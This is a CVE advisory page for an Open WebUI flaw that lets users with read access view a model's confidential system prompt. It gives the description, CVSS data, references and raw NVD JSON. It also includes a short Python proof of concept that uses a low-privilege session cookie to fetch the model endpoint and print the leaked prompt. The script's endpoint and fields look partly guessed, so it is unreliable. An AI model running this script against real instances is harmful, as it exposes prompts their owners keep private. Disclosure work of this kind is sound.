CVE-2026-45387

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests

# Vulnerability Proof of Concept for CVE-2026-45387
# Description: Demonstrates how a low-privilege user can read the system prompt of a model.

target_url = "http://localhost:3000"
model_id = "llama3-70b"  # Example model ID
session_cookie = "session_token_here" # Low-privilege user session

headers = {
    "Cookie": f"session={session_cookie}",
    "Content-Type": "application/json"
}

# Endpoint to fetch model details (vulnerable endpoint)
endpoint = f"{target_url}/api/models/{model_id}"

print(f"[*] Attempting to fetch details for model: {model_id}")
try:
    response = requests.get(endpoint, headers=headers)
    if response.status_code == 200:
        data = response.json()
        # Check if system_prompt is exposed
        if "system_prompt" in data or "prompt" in data:
            print("[+] Vulnerability Confirmed!")
            print(f"[+] Leaked System Prompt: {data.get('system_prompt', data.get('prompt'))}")
        else:
            print("[-] System prompt not found in response (might be patched or different endpoint)")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45387
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45387
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45387/
[4] VulDB https://vuldb.com/cve/CVE-2026-45387
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr
[6] https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45387", "sourceIdentifier": "[email protected]", "published": "2026-05-15T21:16:37.177", "lastModified": "2026-05-15T22:16:55.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}